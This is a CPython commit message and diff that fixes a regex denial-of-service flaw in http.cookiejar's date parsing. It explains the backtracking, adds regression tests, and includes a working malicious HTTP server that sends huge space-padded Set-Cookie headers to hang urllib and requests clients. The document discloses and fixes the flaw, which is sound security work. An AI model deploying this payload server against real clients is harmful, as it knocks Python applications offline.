bpo-38804: Fix REDoS in http.cookiejar (pythonGH-17157)
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and block execution for a long time.
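
As a quick illustration (not part of this patch): http2time() is the
cookiejar helper that ends up applying LOOSE_HTTP_DATE_RE when a cookie's
Expires value is parsed. The example date below is my own, benign input:

    from http.cookiejar import http2time

    # Normal case: returns seconds since the epoch, or None if unparseable.
    print(http2time("09 Feb 1994 22:23:32 GMT"))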

The regex contained multiple overlapping \s* groups.
Ignoring the ?-optional capture groups, the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.
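
A rough timing sketch (mine, not part of the patch) makes the blow-up
visible through http2time(), which wraps LOOSE_HTTP_DATE_RE. The space
counts are kept small so that even an unpatched interpreter finishes
instead of appearing to hang:

    import time
    from http.cookiejar import http2time

    for n_spaces in (100, 200, 400):
        payload = "1-c-1" + " " * n_spaces + "!"
        start = time.perf_counter()
        http2time(payload)  # returns None either way; only the running time differs
        print(f"{n_spaces:4d} spaces -> {time.perf_counter() - start:.3f}s")

Before the fix the time grows steeply (roughly cubically) with the number
of spaces; with the fix each call returns almost immediately.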

You can create a malicious server which responds with Set-Cookie headers
to attack all Python programs that access it, e.g.:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

    "444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
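
A similar timing sketch (mine, not from the patch) for the ISO_DATE_RE
case, using the string quoted above:

    import time
    from http.cookiejar import iso2time

    # Before the fix the two overlapping \s* groups make this roughly
    # quadratic in the number of spaces; after the fix it returns quickly.
    payload = "444444" + (" " * 2000) + "A"
    start = time.perf_counter()
    iso2time(payload)  # returns None in both cases
    print(f"{time.perf_counter() - start:.3f}s")
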
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
bcaller authored and miss-islington committed Nov 22, 2019
1 parent c3cd0de commit 0cbc802
Showing 4 changed files with 27 additions and 6 deletions.
18 changes: 12 additions & 6 deletions Lib/http/cookiejar.py
@@ -214,10 +214,14 @@ def _str2time(day, mon, yr, hr, min, sec, tz):
        (?::(\d\d))?    # optional seconds
     )?                 # optional clock
        \s*
-    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
-       \s*
-    (?:\(\w+\))?       # ASCII representation of timezone in parens.
-       \s*$""", re.X | re.ASCII)
+    (?:
+       ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+) # timezone
+       \s*
+    )?
+    (?:
+       \(\w+\)         # ASCII representation of timezone in parens.
+       \s*
+    )?$""", re.X | re.ASCII)
 def http2time(text):
     """Returns time in seconds since epoch of time represented by a string.
@@ -287,9 +291,11 @@ def http2time(text):
       (?::?(\d\d(?:\.\d*)?))? # optional seconds (and fractional)
    )?                    # optional clock
       \s*
-   ([-+]?\d\d?:?(:?\d\d)?
-    |Z|z)?               # timezone  (Z is "zero meridian", i.e. GMT)
-      \s*$""", re.X | re. ASCII)
+   (?:
+      ([-+]?\d\d?:?(:?\d\d)?
+       |Z|z)             # timezone  (Z is "zero meridian", i.e. GMT)
+         \s*
+   )?$""", re.X | re. ASCII)
 def iso2time(text):
     """
     As for http2time, but parses the ISO 8601 formats:
13 changes: 13 additions & 0 deletions Lib/test/test_http_cookiejar.py
@@ -123,6 +123,13 @@ def test_http2time_garbage(self):
                             "http2time(%s) is not None\n"
                             "http2time(test) %s" % (test, http2time(test)))
 
+    def test_http2time_redos_regression_actually_completes(self):
+        # LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS).
+        # If we regress to cubic complexity, this test will take a very long time to succeed.
+        # If fixed, it should complete within a fraction of a second.
+        http2time("01 Jan 1970{}00:00:00 GMT!".format(" " * 10 ** 5))
+        http2time("01 Jan 1970 00:00:00{}GMT!".format(" " * 10 ** 5))
+
     def test_iso2time(self):
         def parse_date(text):
             return time.gmtime(iso2time(text))[:6]
@@ -180,6 +187,12 @@ def test_iso2time_garbage(self):
             self.assertIsNone(iso2time(test),
                               "iso2time(%r)" % test)
 
+    def test_iso2time_performance_regression(self):
+        # If ISO_DATE_RE regresses to quadratic complexity, this test will take a very long time to succeed.
+        # If fixed, it should complete within a fraction of a second.
+        iso2time('1994-02-03{}14:15:29 -0100!'.format(' '*10**6))
+        iso2time('1994-02-03 14:15:29{}-0100!'.format(' '*10**6))
+
 
 class HeaderTests(unittest.TestCase):
 
1 change: 1 addition & 0 deletions Misc/ACKS
@@ -250,6 +250,7 @@ Zach Byrne
 Vedran Čačić
 Nicolas Cadou
 Jp Calderone
+Ben Caller
 Arnaud Calmettes
 Daniel Calvelo
 Tony Campbell
@@ -0,0 +1 @@
+Fixes a ReDoS vulnerability in :mod:`http.cookiejar`. Patch by Ben Caller.
